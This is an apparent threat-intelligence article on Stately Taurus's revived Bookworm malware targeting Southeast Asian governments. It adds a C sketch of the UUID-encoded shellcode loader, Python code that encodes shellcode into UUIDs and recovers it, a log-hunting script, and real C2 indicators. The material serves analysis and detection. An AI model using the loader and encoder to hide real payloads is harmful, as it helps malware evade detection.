Security researchers at Palo Alto Networks’ Unit 42 have uncovered a resurgence of the modular Bookworm malware in cyberattacks targeting government and diplomatic entities across Southeast Asia.
The activity, attributed to the Chinese state-aligned threat actor Stately Taurus (also tracked as Mustang Panda), shows the group continuing to evolve a decade-old espionage tool while pairing it with new delivery methods.
The campaign leverages a revamped version of Bookworm, a Trojan first documented in 2015, which now incorporates shellcode-based payloads delivered via malicious archive files.
Analysts at Palo Alto Networks’ Unit 42 detected that these files, often disguised as policy documents or meeting agendas (“analysis of the third meeting of ndsc.zip”), deploy a loader called PubLoad that mimics Microsoft Windows Update traffic to bypass network detection.
Bookworm’s Delivery Mechanism
The latest Bookworm variant uses a multi-stage shellcode execution process designed to evade static analysis. Attackers embed the shellcode within Universally Unique Identifiers (UUIDs) stored either as plain ASCII strings or as Base64-encoded blobs. At run time the malware converts each UUID string back into its 16 raw bytes with the Windows API function UuidFromStringA, writing them back to back into a buffer allocated from a heap created with HeapCreate, and then executes the reassembled payload by passing the buffer as the callback to a legitimate enumeration API such as EnumChildWindows or EnumSystemLanguageGroupsA. Because the payload never appears as a contiguous byte sequence on disk, and because the control transfer is made by a benign, signed system API rather than by a direct call, the technique, adapted from publicly available code, gives the operators runtime flexibility while sidestepping signature-based detection.
```c
// Pseudo-code of the shellcode execution flow (simplified; Win32, x64):
HANDLE heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);   // executable heap, so the callback can run under DEP
unsigned char *buffer = HeapAlloc(heap, HEAP_ZERO_MEMORY, uuid_count * sizeof(UUID));
for (size_t i = 0; i < uuid_count; i++)                     // each UUID string becomes 16 raw bytes
    UuidFromStringA((RPC_CSTR)uuid_str[i], (UUID *)(buffer + i * sizeof(UUID)));
EnumChildWindows(NULL, (WNDENUMPROC)buffer, 0);             // callback pointer == shellcode: triggers execution
```
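The byte layout that UuidFromStringA produces is what an analyst has to reverse to get the payload back out of a sample. The following added example (written for this page, not code from the article or from Unit 42) reproduces that layout in Python: the attacker-side split of shellcode into UUID strings, and the analyst-side recovery from either a plain UUID list or a Base64 blob, the two storage forms the article mentions. It relies on the fact that Python's `uuid.UUID(...).bytes_le` is exactly the in-memory Windows GUID layout (little-endian Data1/Data2/Data3, Data4 verbatim). The sample shellcode bytes are constructed for the demo and are not Bookworm's.

```python
"""UUID-encoded shellcode: attacker-side encoding and analyst-side recovery.

Added example, not from the original article or from Unit 42. Emulates the
byte layout UuidFromStringA writes into memory so that UUID strings lifted
from a sample can be turned back into raw shellcode for static analysis.
"""
import base64
import re
import uuid

UUID_RE = re.compile(
    r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
)

# Common x64 shellcode prologue: cld; and rsp, -0x10 (used only as a heuristic).
X64_PROLOGUE = bytes.fromhex("fc4883e4f0")


def shellcode_to_uuids(shellcode: bytes) -> list[str]:
    """Attacker-side step: split the payload into 16-byte chunks and render
    each chunk as the UUID string that UuidFromStringA will convert back into
    those same bytes. The last chunk is padded with NOPs (0x90)."""
    out = []
    for i in range(0, len(shellcode), 16):
        chunk = shellcode[i:i + 16].ljust(16, b"\x90")
        out.append(str(uuid.UUID(bytes_le=chunk)))   # bytes_le == GUID memory layout
    return out


def uuids_to_shellcode(uuid_strings) -> bytes:
    """Analyst-side step: emulate UuidFromStringA for each string and
    concatenate the 16-byte structures in order."""
    return b"".join(uuid.UUID(s).bytes_le for s in uuid_strings)


def extract_uuids(blob: str) -> list[str]:
    """Pull UUID strings out of text in order of appearance. If none are found
    in the clear, try the Base64-blob storage form before giving up."""
    found = UUID_RE.findall(blob)
    if found:
        return found
    try:
        decoded = base64.b64decode(blob, validate=True).decode("ascii", "ignore")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return []
    return UUID_RE.findall(decoded)


def recover_from_blob(blob: str) -> bytes:
    """Full analyst path: locate the UUIDs (plain or Base64) and rebuild bytes."""
    return uuids_to_shellcode(extract_uuids(blob))


def looks_like_x64_shellcode(payload: bytes) -> bool:
    """Cheap triage check on the recovered bytes."""
    return payload.startswith(X64_PROLOGUE)


# Constructed sample (not Bookworm's payload): an x64 prologue, a call, some
# register pushes, then a few NOPs so the last UUID needs padding.
SAMPLE_SHELLCODE = bytes.fromhex("fc4883e4f0e8c0000000415141505251") + b"\x90" * 5

# Constructed Base64 blob in the second storage form the article describes.
SAMPLE_B64 = base64.b64encode("\n".join(shellcode_to_uuids(SAMPLE_SHELLCODE)).encode()).decode()

if __name__ == "__main__":
    for u in shellcode_to_uuids(SAMPLE_SHELLCODE):
        print(u)
    recovered = recover_from_blob(SAMPLE_B64)
    print(recovered.hex(), "x64 prologue:", looks_like_x64_shellcode(recovered))
```

When running this over a real sample, feed `extract_uuids` the string table or resource that carries the UUIDs; order matters, since the loader concatenates them in the sequence it converts them, so extract in file order and do not deduplicate.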
The malware’s command-and-control (C2) infrastructure uses HTTPS POST requests to domains such as www.fjke5oe[.]com, masquerading as Microsoft update servers. A sample request (Figure 1) shows the URL path /v11/2/windowsupdate/redir/v6-winsp1-wuredir, a subtle deviation from the legitimate Windows Update endpoint /v6-win7sp1-wuredir.cab (the "7" is missing and there is no .cab extension). The path alone is easy to miss in a log; the reliable tell is that the request is a POST and goes to a domain Microsoft does not own.
This domain resolved to the IP 103.27.202[.]68, which previously hosted C2 servers for ToneShell, another Stately Taurus-linked backdoor.
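The recommendation to watch for HTTP patterns that imitate Microsoft services can be turned into a concrete hunting check. The added example below (written for this page, not Unit 42's or the vendor's code) scores proxy log lines that carry a Windows Update redirector path by three signals: a host outside an assumed allow-list of Microsoft-owned suffixes, the POST method, and a redirector filename that does not match the real v6-win7sp1-wuredir.cab. The log lines and their space-separated field layout are constructed for the demo; the allow-list is an assumption to be tuned against your own telemetry.

```python
"""Hunting for Windows Update look-alike C2 traffic in proxy logs.

Added example, not from the article or from Unit 42. Log format
(timestamp, client IP, method, host, path) and the Microsoft host
allow-list are assumptions for the demo.
"""
import re
from dataclasses import dataclass, field

# Assumption: suffixes that legitimately serve Windows Update content.
LEGIT_WU_SUFFIXES = (".windowsupdate.com", ".microsoft.com")

# Any request that borrows the redirector path is worth a closer look.
WU_PATH_RE = re.compile(r"/windowsupdate/redir/", re.IGNORECASE)
# Real redirector fetches end in v6-win7sp1-wuredir.cab (per the article).
LEGIT_REDIR_RE = re.compile(r"/redir/v6-win7sp1-wuredir\.cab$", re.IGNORECASE)

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+)$"
)


@dataclass
class Hit:
    line: str
    reasons: list = field(default_factory=list)


def is_microsoft_host(host: str) -> bool:
    host = host.lower()
    return any(host == s.lstrip(".") or host.endswith(s) for s in LEGIT_WU_SUFFIXES)


def assess(line: str):
    """Return a Hit with the reasons a line looks like WU-mimicking C2, or
    None when the line is unparsable, unrelated, or consistent with real WU."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, path, method = m["host"], m["path"], m["method"]
    if not WU_PATH_RE.search(path):
        return None  # not pretending to be Windows Update at all
    reasons = []
    if not is_microsoft_host(host):
        reasons.append(f"windowsupdate path served by non-Microsoft host {host}")
    if method == "POST":
        reasons.append("POST to a redirector path that a real client fetches with GET")
    if not LEGIT_REDIR_RE.search(path):
        reasons.append("redir filename does not match the real v6-win7sp1-wuredir.cab")
    return Hit(line, reasons) if reasons else None


def hunt(log_text: str):
    """Run assess() over every line and keep the hits, in log order."""
    return [h for h in (assess(ln) for ln in log_text.splitlines()) if h]


# Constructed sample log: one genuine-looking fetch, one look-alike POST to the
# domain from the article, one unrelated request.
SAMPLE_LOG = """\
2025-09-01T08:00:01Z 10.1.2.3 GET download.windowsupdate.com /v11/2/windowsupdate/redir/v6-win7sp1-wuredir.cab
2025-09-01T08:00:05Z 10.1.2.3 POST www.fjke5oe.com /v11/2/windowsupdate/redir/v6-winsp1-wuredir
2025-09-01T08:00:09Z 10.1.2.7 GET www.example.com /index.html
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit.line)
        for r in hit.reasons:
            print("  -", r)
```

The host check is the one that matters for alerting; the method and filename checks are there to raise confidence and to survive the operators fixing the typo in the path. In production, resolve the host to its IP as well and pivot on it, since the article notes that 103.27.202[.]68 was reused across Stately Taurus tooling.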
Contemporary Bookworm samples retain the core modular architecture seen in earlier versions, with several notable updates. The Leader.dll module now dynamically initializes components such as Resolver.dll (renamed dafdsafdsaa3) and AES.dll (unchanged), while the deprecated Mover.dll module has been replaced by heap-based payload relocation. Debug paths such as C:\Users\hack\Documents\WhiteFile\LTDIS13n\Release\LTDIS13n.pdb tie the malware to Stately Taurus developers, mirroring artifacts found in ToneShell variants.
Unit 42 emphasizes Southeast Asia’s geopolitical significance as the primary driver of these attacks, particularly targeting ASEAN-affiliated entities.
Palo Alto Networks recommends deploying behavioral analytics tools like Cortex XDR to detect API-based shellcode triggers and monitoring for anomalous HTTP patterns resembling Microsoft services.
As regional tensions escalate, Stately Taurus’ ability to modernize legacy malware like Bookworm underscores the persistent threat posed by state-sponsored adversaries to governmental networks worldwide.
Security teams must prioritize anomaly detection in API usage and network traffic to counter these adaptive tactics.